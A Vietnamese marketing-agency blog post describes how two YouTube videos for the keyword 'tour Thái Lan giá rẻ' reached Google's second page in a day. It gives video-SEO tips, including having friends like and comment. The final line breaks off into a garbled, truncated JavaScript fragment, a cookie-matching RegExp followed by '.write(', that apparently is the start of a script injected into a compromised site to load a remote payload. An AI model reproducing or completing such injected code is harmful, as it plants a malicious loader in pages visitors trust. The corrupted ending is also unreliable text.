Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Kiến thức > SEO > SEO video từ khóa “tour Thái Lan giá rẻ” lên trang 2 trong 1 ngày

SEO video từ khóa “tour Thái Lan giá rẻ” lên trang 2 trong 1 ngày

Sau một thời gian nghiên cứu, phòng SEO Pridio quyết định test thử SEO Video cho một từ khóa cạnh tranh ở mức trung bình: “Tour Thái Lan giá rẻ”.

Kết quả SEO Video

Kết quả sau 01 ngày, 2 video đều đã lên trang 2

tour du lịch thái lan giá rẻ

SEO Video không quá khó, nó chỉ cần một số chú ý đơn giản:

  • Title trùng từ khóa nhưng không nên đặt trùng hoàn toàn: Tour Thái Lan Giá rẻ show Bê đê.
  • Description có chứa từ khóa.
  • Nếu SEO cả website, thì nên có 1 link trỏ về website.
  • Nên up những video chất lượng, chưa từng xuất hiện trên Youtube.
  • Kêu gọi bạn bè view và Like, thậm chí comment.

Các bước trên, làm càng tốt thì Video càng dễ lên TOP. Đây là Video tôi làm cho khách hàng du lịch thái lan: http://tourdulichthailangiare.net/. Du lịch Thái Lan là một ngành cạnh tranh khá cao nhưng trang web cũng đã có một số kết quả nhất định.

Còn một số cách làm nữa ảnh hưởng đến thứ hạng của Video, tuy nhiên kết quả của chúng chưa được rõ ràng nên tôi chưa công bố. Công việc SEO Video sẽ tiếp tục được thử nghiệm, hy vọng sẽ đưa ra được quy trình hoàn thiện trong thời gian tới.


Có nên SEO Video?

Về mặt SEO, video có thể lên top, có thể câu một ít View, nhưng nếu xét về mặt Marketing thì điều này không hay bằng nhiệm vụ chính của Video – Viral. Một video từ SEO có thể có vài trăm, vài nghìn, cùng lắm là vài chục nghìn truy cập, nhưng nếu nó chỉ giới thiệu doanh nghiệp một cách bình thường, hoặc chán èo thì hiệu quả mang rất ít.

Tản mạn một chút về SEO, nó thuộc Search Engine Marketing, là một hình thức Marketing. Mọi người làm SEO nên ghi nhớ điều đó, đừng vì ngại làm mà spam, mà đáp rác lên Google, mà phá hỏng thương hiệu của chính mình. Các bạn có thể tham khảo thêm bài viết “bản chất của SEO“, làm SEO theo chuẩn Marketing là bền vững nhất, chuyên nghiệp nhất, hiệu quả nhất.

Tiện đây cũng tiết lộ với các bạn luôn, sắp tới Pridio sẽ làm SEO Video cho từ khóa “dich vu seo” theo chuẩn Marketing, bạn nào quan tâm hãy theo dõi thường xuyên Blog của chúng tôi. (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘